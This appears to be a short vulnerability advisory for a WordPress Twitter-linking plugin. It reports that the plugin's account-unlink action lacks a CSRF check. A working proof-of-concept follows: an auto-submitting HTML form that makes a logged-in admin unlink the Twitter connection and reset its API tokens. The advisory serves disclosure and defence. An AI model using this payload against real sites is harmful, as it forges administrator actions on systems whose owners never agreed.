Description The plugin does not have CSRF check when unlinking twitter accounts, which could allow attackers to make logged in admins perform such actions via a CSRF attack
Make an admin open an HTML file containing:
```
<body onload="document.forms[0].submit()">
<form action="http://example.com/wp-admin/admin.php?page=hl_twitter_settings&action=unlink" method="POST">
<input type="submit" name="submit" value="Unlink" class="button-primary">
</form>
</body>
```
The Twitter connection will be removed (API tokens reset to `''`)